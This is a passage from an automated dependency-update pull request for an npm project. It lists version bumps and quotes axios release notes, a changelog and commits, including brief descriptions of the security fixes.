[axios](https://github.com/axios/axios) | `0.23.0` | `1.15.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.0` | `1.4.0` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.14.2` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [body-parser](https://github.com/expressjs/body-parser) | `1.19.0` | `1.20.4` |\n| [express](https://github.com/expressjs/express) | `4.17.1` | `4.22.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.1.1` | `3.4.2` |\n| [got](https://github.com/sindresorhus/got) | `9.6.0` | `removed` |\n| [json5](https://github.com/json5/json5) | `1.0.1` | `1.0.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.0.1` | `2.1.4` |\n\n\nUpdates `axios` from 0.23.0 to 1.15.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.0\u003c/h2\u003e\n\u003cp\u003eThis release delivers two critical security patches, adds runtime support for Deno and Bun, and includes significant CI hardening, documentation improvements, and routine dependency updates.\u003c/p\u003e\n\u003ch2\u003e⚠️ Important Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecation:\u003c/strong\u003e \u003ccode\u003eurl.parse()\u003c/code\u003e usage has been replaced to address Node.js deprecation warnings. If you are on a recent version of Node.js, this resolves console warnings you may have been seeing. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10625\"\u003e#10625\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Handling:\u003c/strong\u003e Fixed a \u003ccode\u003eno_proxy\u003c/code\u003e hostname normalisation bypass that could lead to Server-Side Request Forgery (SSRF). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10661\"\u003e#10661\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHeader Injection:\u003c/strong\u003e Fixed an unrestricted cloud metadata exfiltration vulnerability via a header injection chain. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10660\"\u003e#10660\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRuntime Support:\u003c/strong\u003e Added compatibility checks and documentation for Deno and Bun environments. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10652\"\u003e#10652\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10653\"\u003e#10653\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCI Security:\u003c/strong\u003e Hardened workflow permissions to least privilege, added the \u003ccode\u003ezizmor\u003c/code\u003e security scanner, pinned action versions, and gated npm publishing with OIDC and environment protection. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10618\"\u003e#10618\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10619\"\u003e#10619\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10627\"\u003e#10627\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10637\"\u003e#10637\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10666\"\u003e#10666\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003eserialize-javascript\u003c/code\u003e, \u003ccode\u003ehandlebars\u003c/code\u003e, \u003ccode\u003epicomatch\u003c/code\u003e, \u003ccode\u003evite\u003c/code\u003e, and \u003ccode\u003edenoland/setup-deno\u003c/code\u003e to latest versions. Added a 7-day Dependabot cooldown period. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10574\"\u003e#10574\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10572\"\u003e#10572\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10568\"\u003e#10568\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10663\"\u003e#10663\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10664\"\u003e#10664\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10665\"\u003e#10665\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10669\"\u003e#10669\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10670\"\u003e#10670\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10616\"\u003e#10616\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation:\u003c/strong\u003e Unified docs, improved \u003ccode\u003ebeforeRedirect\u003c/code\u003e credential leakage example, clarified \u003ccode\u003ewithCredentials\u003c/code\u003e/\u003ccode\u003ewithXSRFToken\u003c/code\u003e behaviour, HTTP/2 support notes, async/await timeout error handling, header case preservation, and various typo fixes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10649\"\u003e#10649\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10624\"\u003e#10624\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7452\"\u003e#7452\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7471\"\u003e#7471\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10654\"\u003e#10654\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10644\"\u003e#10644\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10589\"\u003e#10589\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHousekeeping:\u003c/strong\u003e Removed stale files, regenerated lockfile, and updated sponsor scripts and blocks. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10584\"\u003e#10584\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10650\"\u003e#10650\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10582\"\u003e#10582\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10640\"\u003e#10640\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10659\"\u003e#10659\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10668\"\u003e#10668\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTests:\u003c/strong\u003e Added regression coverage for urlencoded \u003ccode\u003eContent-Type\u003c/code\u003e casing. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10573\"\u003e#10573\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve Axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/raashish1601\"\u003e\u003ccode\u003e@​raashish1601\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10573\"\u003e#10573\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Kilros0817\"\u003e\u003ccode\u003e@​Kilros0817\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10625\"\u003e#10625\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/ashstrc\"\u003e\u003ccode\u003e@​ashstrc\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10624\"\u003e#10624\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Abhi3975\"\u003e\u003ccode\u003e@​Abhi3975\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10589\"\u003e#10589\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/theamodhshetty\"\u003e\u003ccode\u003e@​theamodhshetty\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7452\"\u003e#7452\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.14.0\u003c/h2\u003e\n\u003cp\u003eThis release focuses on compatibility fixes, adapter stability improvements, and test/tooling modernisation.\u003c/p\u003e\n\u003ch2\u003e⚠️ Important Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBreaking Changes:\u003c/strong\u003e None identified in this release.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAction Required:\u003c/strong\u003e If you rely on env-based proxy behaviour or CJS resolution edge-cases, validate your integration after upgrade (notably \u003ccode\u003eproxy-from-env\u003c/code\u003e v2 alignment and \u003ccode\u003emain\u003c/code\u003e entry compatibility fix).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRuntime Features:\u003c/strong\u003e No new end-user features were introduced in this release.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTest Coverage Expansion:\u003c/strong\u003e Added broader smoke/module test coverage for CJS and ESM package usage. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7510\"\u003e#7510\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHeaders:\u003c/strong\u003e Trim trailing CRLF in normalised header values. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7456\"\u003e#7456\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP/2:\u003c/strong\u003e Close detached HTTP/2 sessions on timeout to avoid lingering sessions. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7457\"\u003e#7457\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFetch Adapter:\u003c/strong\u003e Cancel \u003ccode\u003eReadableStream\u003c/code\u003e created during request-stream capability probing to prevent async resource leaks. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7515\"\u003e#7515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Handling:\u003c/strong\u003e Fixed env proxy behavior with \u003ccode\u003eproxy-from-env\u003c/code\u003e v2 usage. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7499\"\u003e#7499\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.13.2...v1.13.3\"\u003e1.13.3\u003c/a\u003e (2026-01-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ehttp2:\u003c/strong\u003e Use port 443 for HTTPS connections by default. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7256\"\u003e#7256\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d7e60653460480ffacecf85383012ca1baa6263e\"\u003ed7e6065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einterceptor:\u003c/strong\u003e handle the error in the same interceptor (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6269\"\u003e#6269\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/5945e40bb171d4ac4fc195df276cf952244f0f89\"\u003e5945e40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emain field in package.json should correspond to cjs artifacts (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5756\"\u003e#5756\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/7373fbff24cd92ce650d99ff6f7fe08c2e2a0a04\"\u003e7373fbf\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003epackage.json:\u003c/strong\u003e add 'bun' package.json 'exports' condition. Load the Node.js build in Bun instead of the browser build (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5754\"\u003e#5754\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/b89217e3e91de17a3d55e2b8f39ceb0e9d8aeda8\"\u003eb89217e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esilentJSONParsing=false should throw on invalid JSON (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7253\"\u003e#7253\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7257\"\u003e#7257\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/7d19335e43d6754a1a9a66e424f7f7da259895bf\"\u003e7d19335\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eturn AxiosError into a native error (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5394\"\u003e#5394\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5558\"\u003e#5558\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/1c6a86dd2c0623ee1af043a8491dbc96d40e883b\"\u003e1c6a86d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e add handlers to AxiosInterceptorManager interface (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5551\"\u003e#5551\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/8d1271b49fc226ed7defd07cd577bd69a55bb13a\"\u003e8d1271b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e restore AxiosError.cause type from unknown to Error (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7327\"\u003e#7327\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d8233d9e8e9a64bfba9bbe01d475ba417510b82b\"\u003ed8233d9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eunclear error message is thrown when specifying an empty proxy authorization (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6314\"\u003e#6314\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/6ef867e684adf7fb2343e3b29a79078a3c76dc29\"\u003e6ef867e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003eundefined\u003c/code\u003e as a value in AxiosRequestConfig (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5560\"\u003e#5560\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/095033c626895ecdcda2288050b63dcf948db3bd\"\u003e095033c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eadd automatic minor and patch upgrades to dependabot (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6053\"\u003e#6053\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/65a7584eda6164980ddb8cf5372f0afa2a04c1ed\"\u003e65a7584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eadd Node.js coverage script using c8 (closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/7289\"\u003e#7289\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7294\"\u003e#7294\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/ec9d94e9f88da13e9219acadf65061fb38ce080a\"\u003eec9d94e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eadded copilot instructions (\u003ca href=\"https://github.com/axios/axios/commit/3f83143bfe617eec17f9d7dcf8bafafeeae74c26\"\u003e3f83143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with frozen prototypes (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6265\"\u003e#6265\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/860e03396a536e9b926dacb6570732489c9d7012\"\u003e860e033\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eenhance pipeFileToResponse with error handling (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7169\"\u003e#7169\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/88d78842541610692a04282233933d078a8a2552\"\u003e88d7884\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e Intellisense for string literals in a widened union (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6134\"\u003e#6134\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/f73474d02c5aa957b2daeecee65508557fd3c6e5\"\u003ef73474d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com//redirect.github.com/microsoft/TypeScript/issues/33471/issues/issuecomment-1376364329\"\u003emicrosoft/TypeScript#33471\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eReverts\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRevert \u0026quot;fix: silentJSONParsing=false should throw on invalid JSON (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7253\"\u003e#7253\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7\"\u003e#7\u003c/a\u003e…\u0026quot; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7298\"\u003e#7298\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/a4230f5581b3f58b6ff531b6dbac377a4fd7942a\"\u003ea4230f5\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/7253\"\u003e#7253\u003c/a\u003e \u003ca href=\"https://redirect.github.com/axios/axios/issues/7\"\u003e#7\u003c/a\u003e \u003ca href=\"https://redirect.github.com/axios/axios/issues/7298\"\u003e#7298\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e bump peter-evans/create-pull-request from 7 to 8 in the github-actions group (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7334\"\u003e#7334\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/2d6ad5e48bd29b0b2b5e7e95fb473df98301543a\"\u003e2d6ad5e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/ashvin2005\" title=\"+1752/-4 ([#7218](https://github.com/axios/axios/issues/7218) [#7218](https://github.com/axios/axios/issues/7218) )\"\u003eAshvin Tiwari\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/mochinikunj\" title=\"+940/-12 ([#7294](https://github.com/axios/axios/issues/7294) [#7294](https://github.com/axios/axios/issues/7294) )\"\u003eNikunj Mochi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/imanchalsingh\" title=\"+544/-102 ([#7169](https://github.com/axios/axios/issues/7169) [#7185](https://github.com/axios/axios/issues/7185) )\"\u003eAnchal Singh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/jasonsaayman\" title=\"+317/-73 ([#7334](https://github.com/axios/axios/issues/7334) [#7298](https://github.com/axios/axios/issues/7298) )\"\u003ejasonsaayman\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/brodo\" title=\"+99/-120 ([#5558](https://github.com/axios/axios/issues/5558) )\"\u003eJulian Dax\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/AKASHDHARDUBEY\" title=\"+167/-0 ([#7287](https://github.com/axios/axios/issues/7287) [#7288](https://github.com/axios/axios/issues/7288) )\"\u003eAkash Dhar Dubey\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/madhumitaaa\" title=\"+20/-68 ([#7198](https://github.com/axios/axios/issues/7198) )\"\u003eMadhumita\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Tackoil\" title=\"+80/-2 ([#6269](https://github.com/axios/axios/issues/6269) )\"\u003eTackoil\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/justindhillon\" title=\"+41/-41 ([#6324](https://github.com/axios/axios/issues/6324) [#6315](https://github.com/axios/axios/issues/6315) )\"\u003eJustin Dhillon\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Rudrxxx\" title=\"+71/-2 ([#7257](https://github.com/axios/axios/issues/7257) )\"\u003eRudransh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/WuMingDao\" title=\"+36/-36 ([#7215](https://github.com/axios/axios/issues/7215) )\"\u003eWuMingDao\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/codenomnom\" title=\"+70/-0 ([#7201](https://github.com/axios/axios/issues/7201) [#7201](https://github.com/axios/axios/issues/7201) )\"\u003ecodenomnom\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Nandann018-ux\" title=\"+60/-10 ([#7272](https://github.com/axios/axios/issues/7272) )\"\u003eNandan Acharya\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/KernelDeimos\" title=\"+22/-40 ([#7042](https://github.com/axios/axios/issues/7042) )\"\u003eEric Dubé\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/tiborpilz\" title=\"+40/-4 ([#5551](https://github.com/axios/axios/issues/5551) )\"\u003eTibor Pilz\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/joaoGabriel55\" title=\"+31/-4 ([#6314](https://github.com/axios/axios/issues/6314) )\"\u003eGabriel Quaresma\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/turadg\" title=\"+23/-6 ([#6265](https://github.com/axios/axios/issues/6265) )\"\u003eTuradg Aleahmad\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/772a4e54ecc4cc2421e2b746daff0aca10f359d7\"\u003e\u003ccode\u003e772a4e5\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10671\"\u003e#10671\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4b071371be2f810b4bc7797a13838e0f806ebb22\"\u003e\u003ccode\u003e4b07137\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump vite from 8.0.0 to 8.0.5 in /tests/smoke/esm (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10663\"\u003e#10663\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/51e57b39db251bfe3d34af5c943dfea18e06c8b6\"\u003e\u003ccode\u003e51e57b3\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump vite from 8.0.2 to 8.0.5 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10664\"\u003e#10664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/fba1a77930f0c459677b729161627234b88c90aa\"\u003e\u003ccode\u003efba1a77\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump vite from 8.0.2 to 8.0.5 in /tests/module/esm (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10665\"\u003e#10665\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0bf6e28eac86e87da2b60bbf5ea4237910e1a08e\"\u003e\u003ccode\u003e0bf6e28\u003c/code\u003e\u003c/a\u003e chore(deps): bump denoland/setup-deno in the github-actions group (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10669\"\u003e#10669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/8107157c572ee4a54cb28c01ab7f7f3d895ba661\"\u003e\u003ccode\u003e8107157\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the development_dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10670\"\u003e#10670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/e66530e3302d56176befd0778155dafea2487542\"\u003e\u003ccode\u003ee66530e\u003c/code\u003e\u003c/a\u003e ci: require npm-publish environment for releases (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10666\"\u003e#10666\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/49f23cbfe4d308a075281c5f798d4c68f648cbe2\"\u003e\u003ccode\u003e49f23cb\u003c/code\u003e\u003c/a\u003e chore(sponsor): update sponsor 